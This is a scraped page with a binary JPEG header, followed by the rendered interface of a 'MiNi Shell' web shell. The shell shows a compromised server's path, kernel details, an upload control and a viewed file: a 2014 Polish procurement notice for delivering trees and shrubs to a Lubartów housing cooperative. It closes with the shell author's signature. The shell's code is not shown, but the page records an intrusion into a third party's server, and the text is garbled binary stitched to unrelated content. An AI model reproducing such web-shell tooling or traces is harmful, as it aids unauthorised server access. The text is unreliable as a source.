JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140707/146713-N-2014.html

<p class="kh_header"><b>Lubartów: Dostawa drzew i krzewów ozdobnych do nasadzeń na osiedlach 
Spółdzielni Mieszkaniowej w Lubartowie osiedla Cicha, Orlicz-Dreszera</b><br>
<b>Numer ogłoszenia: 146713 - 2014; data zamieszczenia: 07.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółdzielnia Mieszkaniowa w Lubartowie , ul. Cicha 6, 21-100 Lubartów, woj. lubelskie, tel. 081 463 90 01, faks 081 855 30 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.smlubartow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółdzielnia Miesazkaniowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa drzew i krzewów ozdobnych do nasadzeń na osiedlach 
Spółdzielni Mieszkaniowej w Lubartowie osiedla Cicha, Orlicz-Dreszera.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Dostawa drzew i krzewów ozdobnych do nasadzeń na osiedlach Spółdzielni Mieszkaniowej w Lubartowie osiedla Cicha, Orlicz-Dreszera - 1921 roślin. Przedmiot zamówienia realizowany będzie w ramach projektu Zamawiającego pn.: Rewitalizacja zasobów mieszkaniowych Spółdzielni Mieszkaniowej w Lubartowie osiedla Cicha, Orlicz-Dreszera - termomodernizacja, komunikacja, bezpieczne osiedla (zwanego w dalszej części Projektem) współfinansowanego ze środków Unii Europejskiej w ramach Osi Priorytetowej III Atrakcyjność obszarów miejskich i tereny inwestycyjne, Działania 3.2  Rewitalizacja zdegradowanych obszarów miejskich RPO WL na lata 2007-2013, umowa o dofinansowanie nr 03/10-UDA-RPLU.03.02.00-06-080/10-00-0696, zawarta z Województwem Lubelskim, ul. Spokojna 4, 20-074 Lublin
Przedmiot zamówienia wg Wspólnego Słownika Zamówień (CPV): 
03452000-3	 Drzewa
03451300-9 	 Krzewy

Ilości drzew i krzewów które mają być dostarczone w zakresie zamówienia przestawia tabela 1 i 2:
- drzew liściastych  73 szt.,
- drzew iglastych 94 szt.,
- krzewów liściastych i iglastych  1754 szt.,
Tabela 1
os. Cicha
DRZEWA 
L.p.	Nazwa polska	Nazwa łacińska	Ilość sztuk	Obwód pnia [cm]	Pojemnik/
Wysokość	Rodzaj
uprawy
1	Świerk biały Conica	Picea glauca Conica	34		C-10 
70-100cm	K
2	Wiśnia osobliwa Umbraculifera	Prunus ×eminens Umbraculifera	22	12-14	200-220 	B
3	Platan klonolistny	Platanus × hispanica	1	12-14	200-220	B
4	Sosna czarna	Pinus nigra	7	8-10	100-150	B
5	Wiśnia piłkowana Kanzan	Prunus serrulata Kanzan	9	10-12	200-220 	B
6	Robinia akacjowa Umbraculifera	Robinia pseudoacacia Umbraculifera	4	12-14	200-220 	B
7	Jarząb pospolity Fastigiata	Sorbus aucuparia Fastigiata	15	12-14	200-220	B
8	Jałowiec skalny Skyrocket	Juniperus virginiana Skyrocket	53		C-10 
70-100cm 	K
9	Jarząb mączny Magnifica	Sorbus aria Magnifica	16	12-14	200-220	B
SUMA	161
KRZEWY
10	Irga błyszcząca	Cotoneaster lucidus	637	-	C-2
wys. 40-60cm	bB
11	Jałowiec pospolity Repanda	Juniperus communis Repanda	50	-	C-2
wys. 20-40cm	K
12	Tawuła szara Grefsheim	Spiraea x cinerea Grefsheim	35	-	C-2
wys. 40-60cm	K
13	Sosna górska Pumilio	Pinus mugo Pumilio	85	-	C-2
wys. 30-50cm	K
14	Hortensja bukietowa Vanille-Freise	Hydrangea paniculata     Vanille-Freise	26	-	C-2
wys. 40-60cm	K
15	Tawuła gęstokwiatowa	Spiraea densiflora	186	-	C-2
wys. 30-40cm	K
16	Magnolia pośrednia Lennei Alba	Magnolia x soulangiana Lennei Alba	3	 -	C-20
wys. 100-150cm	K
17	Porzeczka krwista Atrorubens	Ribes sanguineum Atrorubens	49	-	C-2
wys. 40-60cm	K
18	Forsycja pośrednia Lynwood	Forsythia xintermedia Lynwood	14	-	C-2
wys. 40-60cm	K
19	Tawuła japońska            Little princess	Spiraea japonica               Little princess	293	-	C-2
wys. 30-40cm	K
20	Pęcherznica kalinolistna Diabolo	Physocarpus opulifolius Diabolo	40	-	C-2
wys. 40-60cm	K
21	Irga dammera Major	Cotoneaster dammeri Major	160	-	C-2
wys. 20-40cm	K
22	Trzmielina Fortunea 
Emeraldn Gold 	Euonymus fortunei 
Emeraldn Gold 	8	-	C-2
wys. 20-40cm	K
23	Tawuła japońska Goldmound	Spiraea japonica Goldmound	10	-	C-2
wys. 30-40cm	K
24	Jaśminowiec  
wonny Aurea	Philadelphus coronarius 
Aurea	8	-	C-2
wys. 40-60cm	K
25	Berberys Thunberga 
Erecta	Berberis thunbergii  
Erecta	11	-	C-2
wys. 40-60cm	K
26	Berberys Thunberga 
Red Pillar	Berberis  thunbergii  
Red Pillar	12	-	C-2
wys. 40-60cm	K
27	Dereń biały 
Sibirica	Cornus alba 
Sibirica	22	-	C-2
wys. 40-60cm	K
SUMA	1649 
Tabela 2
Os. Orlicz-Dreszera
DRZEWA 
L.p.	Nazwa polska	Nazwa łacińska	Ilość sztuk	Obwód pnia [cm]	Pojemnik/
Wysokość	Rodzaj
uprawy
1	Jarząb pospolity Fastigiata	Sorbus aucuparia Fastigiata	6	12-14	200-220	B
SUMA	6
KRZEWY
2	Tawuła japońska            Little princess	Spiraea japonica               Little princess	71	-	C-2
wys. 30-40cm	K
3	Jałowiec pospolity Repanda	Juniperus communis Repanda	12	-	C-2
wys. 20-40cm	K
4	Tawuła szara Grefsheim	Spiraea x cinerea Grefsheim	22	-	C-2
wys. 40-60cm	K
SUMA	105

Użyte w tabelach oznaczenia i wymiary mają następujące znaczenie:
1) uprawiane w gruncie (z bryłą korzeniową - B lub z gołym korzeniem - bB),
2) produkowane w pojemnikach - K
3) W kolumnie obwód pnia, pojemnik/wysokość w cm - podano wymagane:
a) obwody pni drzew mierzone na wys.1 m,
b) wysokość, długość pędów

Zakres przedmiotu zamówienia
Czynności do wykonania przy realizacji zamówienia:
1.	Dostawa materiału szkółkarskiego zgodnie z tabelą nr 1 i 2 do miejsca wyznaczonego przez Zamawiającego tj. ul. Zielona 1 w Lubartowie - w maksimum 5 partiach. 
2.	Właściwe zabezpieczenie materiału szkółkarskiego do transportu, tak aby uchronić go przed ewentualnym uszkodzeniem mechanicznym. 
Nasadzenia przewidziane do realizacji zostaną wykonane przez pracowników SM.

Szczegółowe obowiązki Wykonawcy
a) Materiał roślinny należy przygotować zgodnie z SIWZ.
b) Wykonawca będzie zobowiązany w trakcie prac do dokonywania roboczych uzgodnień prac z Zamawiającym.
c) Wymagania jakościowe dla materiału roślinnego zgodnie z normą PN-R-67022 i PN-R-67023 (drzewa i krzewy) oraz Zaleceniami jakościowymi dla ozdobnego materiału szkółkarskiego - wydanymi przez Związek Szkółkarzy Polskich.
Zamawiający zamawia materiał szkółkarski o następujących parametrach: drzewa form piennych (z pniem o minimalnej długości 2,5 m i prawidłowo wykształconą koroną dla danego gatunku i odmiany) i kolumnowych (wąsko rosnące zgodnie z naturalnymi cechami wzrostu danej odmiany, z wyraźnie wykształconym przewodnikiem, nie podkrzesywane w szkółce), krzewy form naturalnych (rozkrzewione, nie podkrzesywane w szkółce).
Materiał szkółkarski musi być czysty odmianowo i wyprodukowany zgodnie z zasadami agrotechniki szkółkarskiej. Rośliny muszą być zdrowe, zdrewniałe, zahartowane, oraz prawidłowo uformowane z zachowaniem charakterystycznego dla gatunku i odmiany pokroju, wysokości, średnicy i długości pędów. Powinny być zachowane odpowiednie proporcje pomiędzy pniem, koroną i bryłą korzeniową. System korzeniowy musi być dobrze wykształcony, zwarty, odpowiedni do wieku rośliny i sposobu uprawy. Materiał roślinny powinien pochodzić ze szkółki, w której był regularnie szkółkowany w gruncie co 2-4 lata, w pojemniku co 1-2 lata.

Materiał musi posiadać następujące cechy:
a) podstawa korony drzew piennych powinna być uformowana na wysokości minimum 2,5m,
b) pączek szczytowy przewodnika powinien być wyraźnie uformowany,
c) przyrost ostatniego roku powinien wyraźnie i prosto przedłużyć przewodnik,
d) pędy boczne korony drzewa powinny być równomiernie rozmieszczone, korona prawidłowo uformowana poprzez cięcie w szkółce - odpowiednio dla gatunku i odmiany,
e) blizny na przewodniku powinny być dobrze zarośnięte,
f) dobrze wykształcona bryła korzeniowa kilka razy szkółkowana, dla drzew o obwodzie pnia: 8-10cm, średnica bryły 30cm, 10-12cm, średnica bryły 35-40cm, a obwodzie 12-14cm, średnica bryły 40cm. Rośliny kopane z gruntu powinny mieć bryłę korzeniową zwartą, dobrze przerośniętą korzeniami z włośnikami, zabezpieczoną do transportu: jutą lub kontenerem w przypadku krzewów. Krzewy produkowane w pojemnikach powinny mieć silnie przerośniętą bryłę korzeniową, korzenie 
równomiernie rozłożone w pojemniku i widoczne po zewnętrznej stronie bryły. Nie mogą być zbyt zbite (sfilcowane), pojemnik zaś musi mieć wielkość proporcjonalną do rozmiarów rośliny.

Wady niedopuszczalne:
a) silne uszkodzenia mechaniczne roślin,
b) objawy będące skutkiem niewłaściwego nawożenia i agrotechniki,
c) odrosty podkładki poniżej miejsca szczepienia,
d) złe zrośnięcie odmiany szczepionej z podkładką,
e) ślady żerowania szkodników,
f) oznaki chorobowe,
g) martwice i pęknięcia kory,
h) uszkodzenia pąka szczytowego przewodnika,
i) dwa przewodniki korony formy piennej,
j) uszkodzenia lub przesuszenia bryły korzeniowej (luźna bryła).

W wyjątkowych, uzasadnionych przypadkach Zamawiający dopuszcza zaoferowanie innej odmiany danego gatunku roślin niż przedstawiony w Tabelach 1-4 powyżej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.45.20.00-3, 03.45.13.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia przez Wykonawców wadium. Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium w wysokości 2000,00 zł. 
2.Wadium wnoszone jest na cały okres związania ofertą i może być wnoszone w jednej lub kilku następujących formach:
1)    pieniądzu;
2)  	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)   gwarancjach bankowych;
 4)   gwarancjach ubezpieczeniowych
 5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007 r. Nr. 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr.96, poz. 620).
3.Wadium wniesione w pieniądzu wpłaca się na rachunek bankowy Zamawiającego przelewem. Nr rachunku: PKO BP S.A. O/ Lubartów nr  57 1020 3206 0000 8402 0004 4255  z dopiskiem na przelewie Dostawa drzew i krzewów ozdobnych do nasadzeń na osiedlach Spółdzielni Mieszkaniowej w Lubartowie osiedla Cicha, Orlicz-Dreszera
O jego wniesieniu w terminie decydować będzie data (w tym godzina) wpływu na podany wyżej rachunek bankowy Zamawiającego. 
Zamawiający wymaga, aby w przypadku wniesienia wadium w formie: 
- pieniężnej dokument potwierdzający wpłatę wadium został dołączony do oferty,
- innej niż pieniądz, oryginał dokumentu został złożony w ofercie. 
4.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub zamknięcia postępowania bez dokonania wyboru oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
5.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano. 
6.	Zamawiający niezwłocznie zwraca wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je pomniejszone o koszty prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę (Wykonawca poda w ofercie numer konta na które należy zwrócić wadium wpłacone w formie pieniądza. W przypadku nie wskazania numeru konta Zamawiający zwróci je na rachunek bankowy z którego wadium wpłynęło). 
8.	Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana: 
1)	odmówił podpisania umowy w sprawie zamówienia na warunkach określonych w ofercie; 
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3)	zawarcie umowy w sprawie zamówienia stało się niemożliwe z przyczyn leżących po    
stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy z wykorzystaniem wzoru zał. nr 1 do SIWZ. 2. Dokument potwierdzający wpłatę wadium. 3. Oświadczenie o akceptacji warunków przetargu zał. nr 2 do SIWZ. 5. Wykaz zrealizowanych dostaw materiału szkółkarskiego zał. nr 4 do SIWZ 6. Oświadczenie o braku podstaw do wykluczenia z wykorzystaniem wzoru zał. nr 5 do SIWZ 7. Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia z postępowania w postaci otwarcia wobec wykonawcy likwidacji lub ogłoszenia upadłości, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 8. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłaceniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 9. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.smlubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Spółdzielnia Mieszkaniowa w Lubartowie,ul. Cicha 6, 21-100 Lubartów, pokój 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2014 godzina 11:00, miejsce: Spółdzielnia Mieszkaniowa w Lubartowie, ul. Cicha 6, 21 -100 Lubartów, pokój Sekretariatu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com